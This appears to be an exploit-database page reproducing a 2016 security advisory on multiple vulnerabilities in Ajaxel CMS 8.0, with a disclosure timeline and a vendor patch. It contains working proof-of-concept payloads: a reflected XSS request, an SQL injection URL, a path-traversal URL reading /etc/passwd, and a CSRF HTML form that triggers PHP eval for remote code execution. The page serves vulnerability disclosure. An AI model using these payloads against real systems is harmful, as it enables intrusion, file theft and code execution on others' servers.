header-logo
Suggest Exploit
vendor:
Ajaxel CMS
by:
Krzysztof 'DizzyDuck' Kosinski
8,8
CVSS
HIGH
Reflected XSS, SQL Injection, Local File Disclosure, Cross-Site Request Forgery - RCE PoC
79, 89, 22, 352
CWE
Product Name: Ajaxel CMS
Affected Version From: 8.0
Affected Version To: 8.0
Patch Exists: YES
Related CWE: N/A
CPE: a:ajaxel:ajaxel_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Apache 2.4.10, MySQL 5.5.46
2016

Ajaxel CMS 8.0 Multiple Vulnerabilities

Ajaxel CMS version 8.0 and below suffers from multiple vulnerabilities inlcuding LFI, XSS, SQL injection and remote code execution via CSRF. Reflected XSS can be exploited by sending a maliciously crafted HTTP request to the vulnerable server. SQL injection can be exploited by sending a maliciously crafted HTTP request to the vulnerable server. Local File Disclosure can be exploited by sending a maliciously crafted HTTP request to the vulnerable server. Cross-Site Request Forgery - RCE PoC can be exploited by sending a maliciously crafted HTML form to the vulnerable server.

Mitigation:

Vendor released patch for version 8.0 to address these issues.
Source

Exploit-DB raw data:

Ajaxel CMS 8.0 Multiple Vulnerabilities

Vendor: Ajaxel
Product web page: http://www.ajaxel.com
Affected version: 8.0 and below

Summary: Ajaxel CMS is very simple ajaxified CMS and framework
for any project needs.

Desc: Ajaxel CMS version 8.0 and below suffers from multiple
vulnerabilities inlcuding LFI, XSS, SQL injection and remote
code execution via CSRF.

Tested on: Apache 2.4.10
           MySQL 5.5.46

Vendor status:
[13.04.2016] Vulnerabilities discovered.
[14.04.2016] Vendor contacted.
[18.04.2016] Vendor releases patch for version 8.0 to address these issues.
[05.05.2016] Public security advisory released.

Vulnerability discovered by Krzysztof 'DizzyDuck' Kosinski
[dizzyduck_at_zeroscience.mk]


1. Reflected XSS:
-----------------

GET /cmsj9bwp'-alert(1)-'xvjry=mods/ HTTP/1.1
Host: 192.168.10.5

HTTP/1.0 404 Not Found
...
...var Conf={LANG:'en', TPL:'default', DEVICE:'pc', SESSION_LIFETIME:7200,
USER_ID:1, URL_EXT:'', HTTP_EXT:'/', FTP_EXT:'/',
REFERER:'/cmsj9bwp'-alert(1)-'xvjry=mods', VERSION:8.0,
URL_KEY_ADMIN:'cms',...


2. SQL Injection:
-----------------

http://192.168.10.5/cms=mods/tab=ai?mods_ai_tab_ai-submitted=1&f=<SQLi>


3. Local File Disclosure:
-------------------------

http://192.168.10.5/?window&cms=templates&popup=1&file_folder=cms&folder=&file=../../../../../../../../../../../../etc/passwd


4. Cross-Site Request Forgery - RCE PoC:
----------------------------------------

<html>
  <body>
    <form action="http://192.168.10.5/cms=settings_eval_tab/tab=eval/load"
method="POST">
      <input type="hidden" name="data&#91;eval&#93;"
value="phpinfo&#40;&#41;&#59;" />
      <input type="hidden" name="a" value="eval" />
      <input type="hidden"
name="settings&#95;eval&#95;tab&#95;eval&#45;submitted" value="1" />
      <input type="submit" value="Execute" />
    </form>
  </body>
</html>

Navigation

Suggest Exploit

Services By CQR